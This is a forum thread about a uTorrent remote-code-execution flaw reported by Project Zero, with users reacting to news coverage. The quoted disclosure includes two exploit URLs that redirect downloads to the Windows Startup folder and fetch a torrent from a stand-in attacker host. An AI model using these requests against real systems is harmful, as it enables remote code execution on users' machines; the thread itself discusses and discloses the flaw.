Skip to content
View in the app

A better way to browse. Learn more.

Thailand News and Discussion Forum | ASEANNOW

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Hackers controlling your µTorrent application???

Featured Replies

Great. Yet another exploit to worry over.

Running µTorrent and visiting rogue websites. (Who visits rogue websites while running µTorrent app??)

 

 

BitTorrent client exploits could let rogue websites control your PC

Engadet  |  by Jon Fingas

BitTorrent's peer-to-peer app and its lightweight uTorrent counterpart are susceptible to particularly nasty hijacking flaws.

 

BitTorrent Client uTorrent Suffers Security Vulnerability (Updated)

TorrentFreak  |  by ERNESTO  |  FEBRUARY 20, 2018

More details about the vulnerability (and a demo) have been published by Ormandy after we finished this article. It is indeed a DNS rebinding issue that potentially allows outsiders to remotely execute code through uTorrent’s remote control feature.

  • Author

utorrent: various JSON-RPC issues resulting in remote code execution, information disclosure, etc.

project-zero

 

Some details

Quote

 

To be clear, visiting *any* website is enough to compromise these applications.

 ...

This requires some simple dns rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable. For example:


# change the download directory to the Startup folder.
http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup


# download a torrent containing calc.exe
http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent


I wrote a working exploit for this attack, available here:

 

 

Cripes, I'm still at 3.4.1, maybe time to roll back to 2.2.1

All I want to do is upload/download, no playback, streaming etc.

 

Something else to eat up my weekend time....

 

 

Create an account or sign in to comment

Recently Browsing 0

  • No registered users viewing this page.

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.